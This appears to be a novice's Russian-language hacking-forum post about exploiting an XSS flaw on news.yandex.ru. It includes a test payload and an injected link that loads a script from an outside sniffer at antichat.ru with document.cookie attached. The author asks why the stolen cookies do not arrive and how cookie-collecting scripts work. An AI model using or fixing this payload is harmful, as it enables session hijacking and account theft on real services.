Привет всем! (ПОИСКОВИКОМ ПОЛЬЗОВАЛСЯ И ПРОЧИТАЛ ВСЕ СТАТЬИ О XSS на сайте)
_____--____
Начнем
_____--____
Нашел я xss на сайте news.yandex.ru (уязвимость точно есть, так как при подставки кода "<script>alert(document.domain)</script>" выкидывает название сайта) Зарегистрировал я себе 2 мыла на яндексе (1@yandex.ru and 2@yandex.ru) и пытаюсь спереть куки от одно. Тренинг короче)))
____--_____
Практика
____--_____
Отсылаю с 1@yandex.ru на 2@yandex.ru письмо с сылкой
http://[адрес сайта]<script src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;></script>
____--_____
Вопросы
____--_____
1) Почему на снифер не приходят куки?
2) Прочитал на форуме античата что в активных Xss участие жертвы не нужно. Разьясните этот момент ведь мы все равно будем кидать ссылку жертве на мыло??
3) В некоторых статьях советают создать скрипты php
a) нужно прописывать права для скриптов на своем сайте?
Зачем создавать скрипты когда можно через сниффер угнать куки. Или я не прав?
_____--_____
Последние слова (Заключение)
_____--_____
Поиском пользовался, видио смотрел!!!
Спасибо огромное всем кто ответит на вопросы!!